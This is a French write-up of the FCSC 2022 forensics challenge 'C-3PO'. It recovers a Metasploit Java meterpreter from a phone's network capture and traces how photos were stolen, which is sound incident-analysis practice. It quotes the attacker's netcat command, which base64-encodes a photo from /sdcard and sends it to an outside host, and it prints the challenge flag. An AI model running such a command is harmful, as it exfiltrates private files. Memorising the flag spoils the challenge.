Contenu

FCSC 2022 - C-3PO

Contenu

Catégorie : Forensics

Difficulté : ⭐


C-3PO

Ennoncé

Pour votre première analyse, on vous confie le téléphone du PDG de GoodCorp.

Ce dernier est certain que les précieuses photos stockées sur son téléphone sont récupérées par un acteur malveillant.

Vous décidez de mettre en place une capture réseau sur le téléphone, afin de voir ce qu’il en est…

SHA256(capture.cap) = 7b63c22567098f829dfdc190b6f531bbdf23a23e222508752a0a5e5dfa28259c (61Mo).

Note : les épreuves C-3PO, R2-D2 et R5-D4 sont indépendantes


Solve

On a un fichier cap

  • export objet http –> rien
  • DNS –> exfiltration dns –> rien
1
2
3
tcpflow -r capture.cap -o output
mv output/* > output/dump
foremost -i output/dump -o output/foremost_out/

On trouve dans les fichiers récupérés classes.dex

1
cat 00051661/classes.dex

On trouve que l’acteur malveillant est un meterpreter java metasploit

Au final pour trouver le flag avec wireshark, il suffit d’effectuer la requête : frame contains flag et Suivre --> flux tcp

/fcsc-2022/C-3PO/wsk_request.png

1
cat /sdcard/DCIM/flag.png | base64 | nc 172.18.0.1 13387

On a ensuite de la base64 qu’on va transformer en une image

/fcsc-2022/C-3PO/flag.png

Flag : FCSC{2d47d546d4f919e2d50621829a8bd696d3cd1938}